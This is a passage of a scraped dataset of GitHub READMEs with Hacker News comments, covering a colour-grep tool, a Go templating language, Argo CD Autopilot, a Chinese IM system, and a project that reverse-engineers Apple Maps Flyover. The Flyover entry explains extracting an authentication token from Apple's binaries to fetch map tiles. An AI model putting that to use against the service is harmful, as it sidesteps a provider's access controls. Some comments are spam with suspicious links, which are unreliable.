FILENAME\n```\n\n### Note\n\nAlthough this program has a good performance, but performance is not the main\nconcern. There are other tools you should use if you are searching in large\nfiles. Two examples:\n\n- [Ripgrep](https://github.com/BurntSushi/ripgrep)\n- [The Silver Searcher](https://github.com/ggreer/the_silver_searcher)\n\n### Normal Mode\n\nThis method shows matches with the given input:\n\n```bash\n$ blush -b \"first search\" -g \"second one\" -g \"and another one\" files/paths\n```\n\nAny occurrence of `first search` will be in blue, `second one` and `and another one`\nare in green.\n\n![2](https://user-images.githubusercontent.com/428611/164768874-bf687313-c103-449b-bb57-6fdcea51fc5d.png)\n\n### Dropping Unmatched\n\nBy default, unmatched lines are not dropped. But you can use the `-d` flag to\ndrop them:\n\n![3](https://user-images.githubusercontent.com/428611/164768875-c9aa3e47-7db0-454f-8a55-1e2bff332c69.png)\n\n## Arguments\n\n| Argument | Shortcut | Notes |\n| :------------ | :------- | :---------------------------------------------- |\n| N/A | -i | Case insensitive matching. |\n| N/A | -R | Recursive matching. |\n| --no-filename | -h | Suppress the prefixing of file names on output. |\n| --drop | -d | Drop unmatched lines |\n\nFile names or paths are matched from the end. Any argument that doesn't match\nany files or paths are considered as regular expression. If regular expressions\nare not followed by colouring arguments are coloured based on previously\nprovided colour:\n\n```bash\n$ blush -b match1 match2 FILENAME\n```\n\n![4](https://user-images.githubusercontent.com/428611/164768879-f9b73b2c-b6bb-4cf5-a98a-e51535fa554a.png)\n\n### Notes\n\n- If no colour is provided, blush will choose blue.\n- If you only provide file/path, it will print them out without colouring.\n- If the matcher contains only alphabets and numbers, a non-regular expression is applied to search.\n\n## Colour Groups\n\nYou can provide a number for a colour argument to create a colour group:\n\n```bash\n$ blush -r1 match1 -r2 match2 -r1 match3 FILENAME\n```\n\n![5](https://user-images.githubusercontent.com/428611/164768882-5ce57477-e9d5-4170-ac10-731e9391cbee.png)\n\nAll matches will be shown as blue. But `match1` and `match3` will have a\ndifferent background colour than `match2`. This means the numbers will create\ncolour groups.\n\nYou also can provide a colour with a series of match requests:\n\n```bash\n$ blush -r match1 match3 -g match2 FILENAME\n```\n\n## Colours\n\nYou can choose a pre-defined colour, or pass it your own colour with a hash:\n\n| Argument | Shortcut |\n| :-------- | :------- |\n| --red | -r |\n| --green | -g |\n| --blue | -b |\n| --white | -w |\n| --black | -bl |\n| --yellow | -yl |\n| --magenta | -mg |\n| --cyan | -cy |\n\nYou can also pass an RGB colour. It can be in short form (--#1b2, -#1b2), or\nlong format (--#11bb22, -#11bb22).\n\n![6](https://user-images.githubusercontent.com/428611/164768883-154b4fd9-946f-43eb-b3f5-ede6027c3eda.png)\n\n## Complex Grep\n\nYou must put your complex grep into quotations:\n\n```bash\n$ blush -b \"^age: [0-9]+\" FILENAME\n```\n\n![7](https://user-images.githubusercontent.com/428611/164768886-5b94b8fa-77e2-4617-80f2-040edce18660.png)\n\n## Suggestions\n\nThis tool is made to make your experience in terminal a more pleasant. Please\nfeel free to make any suggestions or request features by creating an issue.\n\n## License\n\nUse of this source code is governed by the MIT License. License file can be\nfound in the [LICENSE](./LICENSE) file.\n", "readme_type": "markdown", "hn_comments": "I like it. I started something similar with node (I never aimed for performance) trying to go for high grep compatibility but with added extra colors and js regexp flavour.Nice job! Language-specific coloring is really nice!I'll give it a try. I normally use a different Golang tool called sift as my grep replacement (which I love so far): https://github.com/svent/siftSift's goals seem to be mostly performance (it is super fast), but it would be nice to have some of these more sophisticated coloring features in there as well, as they are useful.Is this speed competitive with tools like the silver searcher (`ag`) or is the focus here on color?Useless use of cat candidate.Do be sure to at least consider supporting no colour! http://no-color.orgGNU grep has support for colors.But... Can it elegantly suppress broken pipe errors?https://www.blockchainhelp.proNice UI!\nSome time ago I wrote something similar, because I was missing some features in ripgrep (which is otherwise pretty awesome): https://github.com/dominikschulz/ggReally cool! But from the title I initially thought this was a grep tool for finding certain colors in your image data.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "benbjohnson/ego", "link": "https://github.com/benbjohnson/ego", "tags": ["go", "template-language", "erb"], "stars": 546, "description": "An ERB-style templating language for Go.", "lang": "Go", "repo_lang": "", "readme": "Ego [![GoDoc](https://img.shields.io/badge/godoc-reference-5272B4.svg?style=flat-square)](https://godoc.org/github.com/benbjohnson/ego)\n===\n\nEgo is an [ERb](http://ruby-doc.org/stdlib-2.1.0/libdoc/erb/rdoc/ERB.html) style templating language for Go. It works by transpiling templates into pure Go and including them at compile time. These templates are light wrappers around the Go language itself.\n\n## Install\n\nYou can find a release build of ego for Linux on the [Releases page](https://github.com/benbjohnson/ego/releases).\n\nTo install ego from source, you can run this command outside of the `GOPATH`:\n\n```sh\n$ go get github.com/benbjohnson/ego/...\n```\n\n\n## Usage\n\nRun `ego` on a directory. Recursively traverse the directory structure and generate Go files for all matching `.ego` files.\n\n```sh\n$ ego mypkg\n```\n\n\n## How to Write Templates\n\nAn ego template lets you write text that you want to print out but gives you some handy tags to let you inject actual Go code.\nThis means you don't need to learn a new scripting language to write ego templates\u2014you already know Go!\n\n### Raw Text\n\nAny text the `ego` tool encounters that is not wrapped in `<%` and `%>` tags is considered raw text.\nIf you have a template like this:\n\n```\nhello!\ngoodbye!\n```\n\nThen `ego` will generate a matching `.ego.go` file:\n\n```\nio.WriteString(w, \"hello!\\ngoodbye!\")\n```\n\nUnfortunately that file won't run because we're missing a `package` line at the top.\nWe can fix that with _code blocks_.\n\n\n### Code Blocks\n\nA code block is a section of your template wrapped in `<%` and `%>` tags.\nIt is raw Go code that will be inserted into our generate `.ego.go` file as-is.\n\nFor example, given this template:\n\n```\n<%\npackage myapp\n\nfunc Render(ctx context.Context, w io.Writer) {\n%>\nhello!\ngoodbye!\n<% } %>\n```\n\nThe `ego` tool will generate:\n\n```\npackage myapp\n\nimport (\n\t\"context\"\n\t\"io\"\n)\n\nfunc Render(ctx context.Context, w io.Writer) {\n\tio.WriteString(w, \"hello!\\ngoodbye!\")\n}\n```\n\n_Note the `context` and `io` packages are automatically imported to your template._\n_These are the only packages that do this._\n_You'll need to import any other packages you use._\n\n\n### Print Blocks\n\nOur template is getting more useful.\nWe now have actually runnable Go code.\nHowever, our templates typically need output text frequently so there are blocks specifically for this task called _print blocks_.\nThese print blocks wrap a Go expression with `<%=` and `%>` tags.\n\nWe can expand our previous example and add a type and fields to our code:\n\n\n```\n<%\npackage myapp\n\ntype NameRenderer struct {\n\tName string\n\tGreet bool\n}\n\nfunc (r *NameRenderer) Render(ctx context.Context, w io.Writer) {\n%>\n\t<% if r.Greet { %>\n\t\thello, <%= r.Name %>!\n\t<% } else { %>\n\t\tgoodbye, <%= r.Name %>!\n\t<% } %>\n<% } %>\n```\n\nWe now have a conditional around our `Greet` field and we are printing the `Name` field.\nOur generated code will look like:\n\n\n```\npackage myapp\n\nimport (\n\t\"context\"\n\t\"io\"\n)\n\ntype NameRenderer struct {\n\tName string\n\tGreet bool\n}\n\nfunc Render(ctx context.Context, w io.Writer) {\n\tif r.Greet {\n\t\tio.WriteString(w, \"hello, \")\n\t\tio.WriteString(w, html.EscapeString(fmt.Sprint(r.Name)))\n\t\tio.WriteString(w, \"!\")\n\t} else {\n\t\tio.WriteString(w, \"goodbye, \")\n\t\tio.WriteString(w, html.EscapeString(fmt.Sprint(r.Name)))\n\t\tio.WriteString(w, \"!\")\n\t}\n}\n```\n\n\n#### Printing unescaped HTML\n\nThe `<%= %>` block will print your text as escaped HTML, however, sometimes you need the raw text such as when you're writing JSON.\nTo do this, simply wrap your Go expression with `<%==` and `%>` tags.\n\n\n### Components\n\nSimple code and print tags work well for simple templates but it can be difficult to make reusable functionality.\nYou can use the component syntax to print types that implement this `Renderer` interface:\n\n```\ntype Renderer interface {\n\tRender(context.Context, io.Writer)\n}\n```\n\nComponent syntax look likes HTML.\nYou specify the type you want to instantiate as the node name and then use attributes to assign values to fields.\nThe body of your component will be assigned as a closure to a field called `Yield` on your component type.\n\nFor example, let's say you want to make a reusable button that outputs [Bootstrap 4.0](http://getbootstrap.com/) code:\nWe can write this component as an ego template or in pure Go code.\nHere we'll write the component in Go:\n\n```\npackage myapp\n\nimport (\n\t\"context\"\n\t\"io\"\n)\n\ntype Button struct {\n\tStyle string\n\tYield func()\n}\n\nfunc (r *Button) Render(ctx context.Context, w io.Writer) {\n\tfmt.Fprintf(w, `
`, r.Style)\n\tif r.Yield {\n\t\tr.Yield()\n\t}\n\tfmt.Fprintf(w, `
`)\n}\n```\n\nNow we can use that component from a template in the same package like this:\n\n```\n<%\npackage myapp\n\ntype MyTemplate struct {}\n\nfunc (r *MyTemplate) Render(ctx context.Context, w io.Writer) {\n%>\n\t
\n\t\tDon't click me!\n\t
\n<% } %>\n```\n\nOur template automatically convert our component syntax into an instance and invocation of `Button`:\n\n```\nvar EGO Button\nEGO.Style = \"danger\"\nEGO.Yield = func() { io.WriteString(w, \"Don't click me!\") }\nEGO.Render(ctx, w)\n```\n\nField values can be specified as any Go expression.\nFor example, you could specify a function to return a value for `Button.Style`:\n\n```\nDon't click me!\n```\n\n#### Named closures\n\nThe `Yield` is a special instance of a closure, however, you can also specify named closures using the `::` syntax.\n\nGiven a component type:\n\n```\ntype MyView struct {\n\tHeader func()\n\tYield func()\n}\n```\n\nWe can specify the separate closures like this:\n\n```\n\n\t\n\t\tThis content will go in the Header closure.\n\t\n\n\tThis content will go in the Yield closure.\n\n```\n\n#### Importing components from other packages\n\nYou can import components from other packages by using a namespace that matches the package name\nThe `ego` namespace is reserved to import types in the current package.\n\nFor example, you can import components from a library such as [bootstrap-ego](https://github.com/benbjohnson/bootstrap-ego):\n\n```\n<%\npackage myapp\n\nimport \"github.com/benbjohnson/bootstrap-ego\"\n\ntype MyTemplate struct {}\n\nfunc (r *MyTemplate) Render(ctx context.Context, w io.Writer) {\n%>\n\t\n\t\t\n\t\t\t
\n\t\t\t\tDon't click me!\n\t\t\t
\n\t\t
\n\t
\n<% } %>\n```\n\n\n## Caveats\n\nUnlike other runtime-based templating languages, ego does not support ad hoc templates. All templates must be generated before compile time.\n\nEgo does not attempt to provide any security around the templates. Just like regular Go code, the security model is up to you.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "argoproj-labs/argocd-autopilot", "link": "https://github.com/argoproj-labs/argocd-autopilot", "tags": [], "stars": 546, "description": "Argo-CD Autopilot", "lang": "Go", "repo_lang": "", "readme": "

\"Argo

\n\n[![Codefresh build status]( https://g.codefresh.io/api/badges/pipeline/codefresh-inc/argocd-autopilot%2Frelease?type=cf-1)]( https://g.codefresh.io/public/accounts/codefresh-inc/pipelines/new/60881f8199c9564ef31aac61) \n[![codecov](https://codecov.io/gh/argoproj-labs/argocd-autopilot/branch/main/graph/badge.svg?token=IDyZNfRUfY)](https://codecov.io/gh/argoproj-labs/argocd-autopilot) \n[![Documentation Status](https://readthedocs.org/projects/argocd-autopilot/badge/?version=latest)](https://argocd-autopilot.readthedocs.io/en/latest/?badge=latest)\n[![slack](https://img.shields.io/badge/slack-argoproj-brightgreen.svg?logo=slack)](https://argoproj.github.io/community/join-slack/)\n\n## Introduction\n\nNew users to GitOps and Argo CD are not often sure how they should structure their repos, add applications, promote apps across environments, and manage the Argo CD installation itself using GitOps. \n\nArgo CD Autopilot saves operators time by:\n\n- Installing and managing the Argo CD application using GitOps.\n- Providing a clear structure for how applications are to be added and updated, all from git.\n- Creating a simple pattern for making updates to applications and promoting those changes across environments.\n- Enabling better disaster recovery by being able to bootstrap new clusters with all the applications previously installed.\n- Handles secrets for Argo CD to prevent them from spilling into plaintext git. (Soon to come)\n\nThe Argo-CD Autopilot is a tool which offers an opinionated way of installing Argo-CD and managing GitOps repositories.\n\n## Installation\n### Using brew:\n```bash\n# install\nbrew install argocd-autopilot\n\n# check the installation\nargocd-autopilot version\n```\n\n### Using scoop:\n```bash\n# update\nscoop update\n\n# install\nscoop install argocd-autopilot\n\n# check the installation\nargocd-autopilot version\n```\n\n### Using chocolatey:\n```bash\n# install\nchoco install argocd-autopilot\n\n# check the installation\nargocd-autopilot version\n```\n\n### Linux AUR:\n```bash\n# install\nyay -S argocd-autopilot-bin\n# or\nsudo pacman -S argocd-autopilot-bin\n\n# check the installation\nargocd-autopilot version\n```\n\n### Linux and WSL (using curl):\n```bash\n# get the latest version or change to a specific version\nVERSION=$(curl --silent \"https://api.github.com/repos/argoproj-labs/argocd-autopilot/releases/latest\" | grep '\"tag_name\"' | sed -E 's/.*\"([^\"]+)\".*/\\1/')\n\n# download and extract the binary\ncurl -L --output - https://github.com/argoproj-labs/argocd-autopilot/releases/download/$VERSION/argocd-autopilot-linux-amd64.tar.gz | tar zx\n\n# move the binary to your $PATH\nmv ./argocd-autopilot-* /usr/local/bin/argocd-autopilot\n\n# check the installation\nargocd-autopilot version\n```\n\n### Mac (using curl):\n```bash\n# get the latest version or change to a specific version\nVERSION=$(curl --silent \"https://api.github.com/repos/argoproj-labs/argocd-autopilot/releases/latest\" | grep '\"tag_name\"' | sed -E 's/.*\"([^\"]+)\".*/\\1/')\n\n# download and extract the binary\ncurl -L --output - https://github.com/argoproj-labs/argocd-autopilot/releases/download/$VERSION/argocd-autopilot-darwin-amd64.tar.gz | tar zx\n\n# move the binary to your $PATH\nmv ./argocd-autopilot-* /usr/local/bin/argocd-autopilot\n\n# check the installation\nargocd-autopilot version\n```\n\n## Docker\nWhen using the Docker image, you have to provide the `.kube` and `.gitconfig` directories as mounts to the running container:\n```\ndocker run \\\n -v ~/.kube:/home/autopilot/.kube \\\n -v ~/.gitconfig:/home/autopilot/.gitconfig \\\n -it quay.io/argoprojlabs/argocd-autopilot \n```\n\n## Getting Started\n```bash\n# All of the commands need your git token with the --git-token flag,\n# or the GIT_TOKEN env variable:\n\n export GIT_TOKEN=\n\n# The commands will also need your repo clone URL with the --repo flag,\n# or the GIT_REPO env variable:\n\n export GIT_REPO=\n\n# 1. Run the bootstrap installation on your current kubernetes context.\n# This will install argo-cd as well as the application-set controller.\n\n argocd-autopilot repo bootstrap\n\n# Please note that this will automatically attempt to create a private repository,\n# if the clone URL references a non-existing one. If the repository already exists,\n# the command will just clone it.\n\n# 2. Create your first project\n\n argocd-autopilot project create my-project\n\n# 3. Install your first application on your project\n\n argocd-autopilot app create demoapp --app github.com/argoproj-labs/argocd-autopilot/examples/demo-app/ -p my-project\n```\n\nNow, if you go to your Argo-CD UI, you should see something similar to this:\n\n![](./docs/assets/getting_started_apps_1.png)\n\nHead over to our [Getting Started](./docs/Getting-Started.md) guide for further details.\n\n## How it works\nThe autopilot bootstrap command will deploy an Argo-CD manifest to a target k8s cluster, and will commit an Argo-CD Application manifest under a specific directory in your GitOps repository. This Application will manage the Argo-CD installation itself - so after running this command, you will have an Argo-CD deployment that manages itself through GitOps.\n\nFrom that point on, the user can create Projects and Applications that belong to them. Autopilot will commit the required manifests to the repository. Once committed, Argo-CD will do its magic and apply the Applications to the cluster.\n\nAn application can be added to a project from a public git repo + path, or from a directory in the local filesystem.\n\n## Architecture\n![Argo-CD Autopilot Architecture](./docs/assets/architecture.png)\n\nAutopilot communicates with the cluster directly **only** during the bootstrap phase, when it deploys Argo-CD. After that, most commands will only require access to the GitOps repository. When adding a Project or Application to a remote k8s cluster, autopilot will require access to the Argo-CD server.\n\nYou can read more about it in the [official proposal doc](https://docs.google.com/document/d/1gxKxaMQzH9nNDWW9mZV5_cS7EO4S-pm1s_u5aMK-PZQ/edit?usp=sharing).\n\n## Features\n* Opinionated way to build a multi-project multi-application system, using GitOps principles.\n* Create a new GitOps repository, or use an existing one.\n* Supports creating the entire directory structure under any path the user requires.\n* When adding applications from a public repo, allow committing as either a kustomization that references the public repo, or as a \"flat\" manifest file containing all the required resources.\n* Use a different cluster from the one Argo-CD is running on, as a default cluster for a Project, or a target cluster for a specific Application.\n\n## Slack Channel\nJoin us in channel #argo-autopilot in CNCF slack workspace.\n\nClick here to join: https://slack.cncf.io/\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "retroplasma/flyover-reverse-engineering", "link": "https://github.com/retroplasma/flyover-reverse-engineering", "tags": ["apple-maps", "apple-flyover", "reverse-engineering", "gis", "3d-models", "extract"], "stars": 545, "description": "Reversing Apple's 3D satellite mode", "lang": "Go", "repo_lang": "", "readme": "\"header\"\n\nReverse-engineering *Flyover* (3D satellite mode) from Apple Maps. Similar work is done for Google Earth [here](https://github.com/retroplasma/earth-reverse-engineering).\n\n#### Status\nRoughly, these parts have been figured out:\n- bootstrap of manifests\n- URL structure\n- authentication algorithm\n- map tiling and conversion from geo coordinates\n- mesh decompression (huffman tables, edgebreaker variant etc.)\n- tile lookup using octree\n\nWe can authenticate URLs and retrieve textured 3D models from given coordinates (latitude, longitude).\n\n#### General\nData is stored in map tiles. These five tile styles are used for Flyover:\n\n|Type | Purpose | URL structure |\n|------|---------------------------------------------|------------------------------------------------------|\n|C3M | Texture, Mesh, Transformation(, Animation) | \ud83c\udd50(?\\|&)style=15&v=\u24ff®ion=\u2776&x=\u2777&y=\u2778&z=\u2779&h=\u277a |\n|C3MM 1| Metadata | \ud83c\udd50(?\\|&)style=14&v=\u24ff&part=\u277b®ion=\u2776 | \n|C3MM 2| Metadata | \ud83c\udd50(?\\|&)style=52&v=\u24ff®ion=\u2776&x=\u2777&y=\u2778&z=\u2779&h=\u277a | \n|DTM 1 | Terrain/Surface/Elevation | \ud83c\udd50(?\\|&)style=16&v=\u24ff®ion=\u2776&x=\u2777&y=\u2778&z=\u2779 |\n|DTM 2 | Terrain/Surface/Elevation | \ud83c\udd50(?\\|&)style=17&v=\u24ff&size=\u277c&scale=\u277d&x=\u2777&y=\u2778&z=\u2779 |\n\n- \ud83c\udd50: URL prefix from resource manifest\n- \u24ff: Version from resource manifest or altitude manifest using region\n- \u2776: Region ID from altitude manifest\n- \u2777\u2778\u2779: Map tile numbers ([tiled web map](https://en.wikipedia.org/wiki/Tiled_web_map) scheme)\n- \u277a: Height/altitude index. Probably from C3MM\n- \u277b: Incremental part number\n- \u277c\u277d: Size/scale. Not sure where its values come from\n\n#### Resource hierarchy\n```\nResourceManifest\n\u2514\u2500 AltitudeManifest\n \u251c\u2500 C3MM\n \u2502 \u2514\u2500 C3M\n \u2514\u2500 DTM?\n```\nFocusing on C3M(M) for now. DTMs are images with a footer and are probably used for the [grid](https://user-images.githubusercontent.com/46618410/53483243-fdcbf700-3a78-11e9-8fc0-ad6cfa8c57cd.png) that is displayed when Maps is loading.\n\n#### Code\nThis repository is structured as follows:\n\n|Directory | Description |\n|--------------------|------------------------------|\n|[cmd](./cmd) | command line programs |\n|[pkg](./pkg) | most of the actual code |\n|[proto](./proto) | protobuf files |\n|[scripts](./scripts)| additional scripts |\n|[vendor](./vendor) | dependencies |\n\n##### Setup\n\nInstall [Go](https://golang.org/) 1.15.x and run:\n```bash\ngo get -d github.com/retroplasma/flyover-reverse-engineering/...\ncd \"$(go env GOPATH)/src/github.com/retroplasma/flyover-reverse-engineering\"\n```\n\nThen edit [config.json](config.json):\n- automatically (macOS, Linux, WSL):\n - `./scripts/get_config.sh > config.json`\n- faster (macOS Catalina or older):\n - `./scripts/get_config_macos.sh > config.json`\n- or manually (Catalina or older):\n - `resourceManifestURL`: from [GEOConfigStore.db/com.apple.GEO.plist](#files-on-macos) or [GeoServices](#files-on-macos) binary\n - `tokenP1`: from [GeoServices](#files-on-macos) binary (function: `GEOURLAuthenticationGenerateURL`)\n\n##### Command line programs\nHere are some command line programs that use code from [pkg](./pkg):\n\n###### Export OBJ [[code]](./cmd/export-obj/main.go)\n\nUsage:\n```\ngo run cmd/export-obj/main.go [lat] [lon] [zoom] [tryXY] [tryH]\n\nParameter Description Example\n--------------------------------------\nlat Latitude 34.007603\nlon Longitude -118.499741\nzoom Zoom (~ 13-20) 20\ntryXY Area scan 3\ntryH Altitude scan 40\n```\n\nThis exports Santa Monica Pier to `./downloaded_files/obj/...`:\n```\ngo run cmd/export-obj/main.go 34.007603 -118.499741 20 3 40\n```\n\nOptional: Center-scale OBJ using node.js script:\n```\nnode scripts/center_scale_obj.js\n```\n\nIn Blender (compatible tutorial [here](https://github.com/retroplasma/earth-reverse-engineering/blob/1dd24a723513d7e96f249e2c635416d4596992c4/BLENDER.md)):\n\n\n\n\n###### Authenticate URL [[code]](./cmd/auth/main.go)\nThis authenticates a URL using parameters from `config.json`:\n```\ngo run cmd/auth/main.go [url]\n```\n\n###### Parse C3M file [[code]](./cmd/parse-c3m/main.go)\nThis parses a C3M v3 file, decompresses meshes, reads JPEG textures and produces a struct that contains a textured 3d model:\n```\ngo run cmd/parse-c3m/main.go [file]\n```\n\n###### Parse C3MM file [[code]](./cmd/parse-c3mm/main.go)\nThis parses a C3MM v1 file. The C3MM files in a region span octrees whose roots are indexed in the first file.\n```\ngo run cmd/parse-c3mm/main.go [file] [[file_number]]\n```\n\n#### Files on macOS\n- `~/Library/Containers/com.apple.geod/Data/Library/Caches/com.apple.geod/GEOConfigStore.db`\n - last resource manifest url\n- `~/Library/Preferences/com.apple.GEO.plist`\n - last resource manifest url ~prior to catalina\n- `~/Library/Caches/GeoServices/Resources/altitude-*.xml`\n - defines regions for c3m urls\n - `altitude-*.xml` url in resource manifest\n- `~/Library/Containers/com.apple.geod/Data/Library/Caches/com.apple.geod/MapTiles/MapTiles.sqlitedb`\n - local map tile cache\n- `/System/Library/PrivateFrameworks/GeoServices.framework/GeoServices`\n - resource manifest base url, networking, caching, authentication\n- `/System/Library/PrivateFrameworks/VectorKit.framework/VectorKit`\n - parsers, decoders\n- `/System/Library/PrivateFrameworks/GeoServices.framework/XPCServices/com.apple.geod.xpc`\n - loads `GeoServices`\n- `/Applications/Maps.app/Contents/MacOS/Maps`\n - loads `VectorKit`\n\n#### Important\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n", "readme_type": "markdown", "hn_comments": "I am making 8 to 10 dollar par hour at home on laptop ,, This is make happy But now i am Working 5 hour Dailly and make 40 dollar Easily .. This is enough for me to happy my family..how ?? i am making this so u can do it Easily....Click this link http://xurl.es/simplejobsthis is the same person who RE'd Google Earth a couple months ago: https://news.ycombinator.com/item?id=18900080I\u2019d be interested in hearing how they reverse engineered the data!As someone who works with GIS data and map meshes this is really awesome. Hats off to the author.Coincidence: Half an hour after reading this thread, a white Subaru with California tags stopped at the red light outside my office window. Big disco ball on a platform attached to the roof and \"Apple Maps maps.apple.com\" stenciled on the window.I took a picture.https://imgur.com/UwK2wYyI don't think this is satellite data, most likely photos captured from planes.And I'd kinda be curious to what Microsoft has been working on, I remember their birds eye was pretty good a few years ago.Apple I'd believe the are selectively trying to improve their data in areas that are heavily visited by their users.Also, I did for the first time see an Apple branded car with a photo sphere on the roof recently and kinda got excited that they are gonna try and bring competition into maps / street view that Google has dominated for the last decade.that's really greatI just like how the example is the end of the Santa Monica pier!This is awesome. What are people using it for?I recently asked the founder of a pretty big GIS company how they handle plagiarism. The answer: \"we don't bother. [we just monetize services on top of open data.]\"So it looks like the intentional errors method didn't work out in the end. [1]Wonder if Apple will be as accommodating though :phttps://www.gislounge.com/map-traps-intentional-mapping-erro...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Terry-Ye/im", "link": "https://github.com/Terry-Ye/im", "tags": ["goim", "im"], "stars": 546, "description": " \u7eafgo\u5b9e\u73b0\u7684\u5206\u5e03\u5f0fim\u5373\u65f6\u901a\u8baf\u7cfb\u7edf\uff0c\u5404\u5c42\u53ef\u5355\u72ec\u90e8\u7f72\uff0c\u4e4b\u95f4\u901a\u8fc7rpc\u901a\u8baf", "lang": "Go", "repo_lang": "", "readme": "### \u7b80\u4ecb\n\u7eafgo\u5b9e\u73b0\u7684im\u5373\u65f6\u901a\u8baf\u7cfb\u7edf\uff0c\u5404\u5c42\u53ef\u5355\u72ec\u90e8\u7f72\uff0c\u4e4b\u95f4\u901a\u8fc7rpc\u901a\u8baf\uff0c\u652f\u6301\u96c6\u7fa4\uff0c\u5b66\u4e60\u4e8egoim, \u53e6\u4f7f\u7528\u4e8ezookeeper,\u6269\u5c55\u6027\u4f1a\u5927\u5927\u589e\u5f3a, \u603b\u5206\u4e09\u5c42\n1. comet\uff08\u7528\u6237\u8fde\u63a5\u5c42\uff09\uff0c\u53ef\u4ee5\u76f4\u63a5\u90e8\u7f72\u591a\u4e2a\u8282\u70b9\uff0c\u6bcf\u4e2a\u8282\u70b9\u4fdd\u8bc1serverId \u552f\u4e00\uff0c\u5728\u914d\u7f6e\u6587\u4ef6comet.toml\n2. logic\uff08\u4e1a\u52a1\u903b\u8f91\u5c42\uff09\uff0c\u65e0\u72b6\u6001\uff0c\u5404\u5c42\u901a\u8fc7rpc\u901a\u8baf\uff0c\u5bb9\u6613\u6269\u5c55\uff0c\u652f\u6301http\u63a5\u53e3\u6765\u63a5\u6536\u6d88\u606f\n3. job\uff08\u4efb\u52a1\u63a8\u9001\u5c42\uff09\u901a\u8fc7redis \u8ba2\u9605\u53d1\u5e03\u529f\u80fd\u8fdb\u884c\u63a8\u9001\u5230comet\u5c42\u3002\n\n### \u67b6\u6784\u56fe\n![image](https://note.youdao.com/yws/public/resource/ac2abf3027ec5c46d62bb5d690d2ed18/xmlnote/WEBRESOURCEabe5f0a5c9699a8c878afac92f4dc6bb/3749)\n\n### \u65f6\u5e8f\u56fe\n\u4ee5\u4e0bComet \u5c42\uff0cLogic \u5c42\uff0cJob\u5c42\u90fd\u53ef\u4ee5\u7075\u6d3b\u6269\u5c55\u673a\u5668\n![image](https://note.youdao.com/yws/public/resource/ac2abf3027ec5c46d62bb5d690d2ed18/xmlnote/WEBRESOURCE2b38217eac4718c99b817005e864fe5d/2921)\n\n### \u7279\u6027\n1. \u5206\u5e03\u5f0f\uff0c\u53ef\u62d3\u6251\u7684\u67b6\u6784\n2. \u652f\u6301\u5355\u4e2a\uff0c\u623f\u95f4\u63a8\u9001\n3. \u5fc3\u8df3\u652f\u6301\uff08gorilla/websocket\u5185\u7f6e\uff09\n4. \u57fa\u4e8eredis \u505a\u6d88\u606f\u63a8\u9001\n5. \u8f7b\u91cf\u7ea7\n6. \u6301\u7eed\u8fed\u4ee3...\n\n### \u90e8\u7f72\n1. \u5b89\u88c5\n```\ngo get -u github.com/Terry-Ye/im\nmv $GOPATH/src/github.com/Terry-Ye/im $GOPATH/src/im\ncd $GOPATH/src/im\ngo get ./...\n# \u9700\u8981\u4f7f\u7528zookeeper\u670d\u52a1 \u6587\u6863\u6700\u5e95\u6709\u5b89\u88c5\u542f\u52a8\u65b9\u6cd5\ngo get -u -v -tags \"zookeeper\" github.com/smallnest/rpcx/...\n\n\n\n```\n\ngolang.org \u5305\u62c9\u4e0d\u4e0b\u6765\u7684\u60c5\u51b5\uff0c\u4f8b\n```\npackage golang.org/x/net/ipv4: unrecognized import path \"golang.org/x/net/ipv4\" (https fetch: Get https://golang.org/x/net/ipv4?go-get=1: dial tcp 216.239.37.1:443: i/o timeout)\n```\n\n\u4ecegithub \u62c9\u4e0b\u6765\uff0c\u518d\u79fb\u52a8\u4f4d\u7f6e\n```\n\ngit clone https://github.com/golang/net.git\nmkdir -p golang.org/x/\n\nmv net $GOPATH/src/golang.org/x/\n```\n\n2. \u90e8\u7f72im\n\u5b89\u88c5comet\u3001logic\u3001job\u6a21\u5757\n```\n# \u6ce8\u610f\uff1a\u7b2c\u4e00\u6b21\u9700\u8981\u5148\u542f\u52a8logic \uff0c\u56e0\u4e3a\u8981\u6ce8\u518c \u670d\u52a1\u7aef\u7684zookeeper, \u4e0d\u7136\u5148\u542f\u52a8comet\u4f1a\u62a5\u9519\uff0c\u7b2c\u4e8c\u6b21\u5219\u4e0d\u9700\u8981\ncd ../logic/\nmv logic.toml.example logic.toml\ngo install -tags zookeeper # \u6216 go run -tags zookeeper *.go\n$GOPATH/bin/logic d $GOPATH/src/im/logic/\n# nohup $GOPATH/bin/logic d $GOPATH/src/im/logic/ 2>&1 > /data/log/im/logic.log &\n\ncd $GOPATH/src/im/comet\nmv comet.toml.example comet.toml\ngo install -tags zookeeper # \u6216 go run -tags zookeeper *.go\n# \u542f\u52a8\n$GOPATH/bin/comet d $GOPATH/src/im/comet/\n# nohup $GOPATH/bin/comet d $GOPATH/src/im/comet/ 2>&1 > /data/log/im/comet.log &\n\n\ncd ../job\nmv job.toml.example job.toml\ngo install # \u6216 go run *.go\n$GOPATH/bin/job d $GOPATH/src/im/job/\n# nohup $GOPATH/bin/job d $GOPATH/src/im/job/ 2>&1 > /data/log/im/job.log &\n\n\n\n// demo\u9875\u9762\u6267\u884c\ncd $GOPATH/src/im/demo\ngo run main.go\n\n```\n\n3. [im_api](https://github.com/Terry-Ye/im_api) \u662fim\u7cfb\u7edf\u4e2d\u4f7f\u7528\u7684\u63a5\u53e3\uff0c\u9700\u8981\u50cfdemo\u90a3\u6837\u6574\u4f53\u8dd1\u8d77\u6765\u9700\u8981\u5b8c\u6574\u7684\u90e8\u7f72\n\n### \u90e8\u7f72\u6ce8\u610f\u4e8b\u9879\n1. 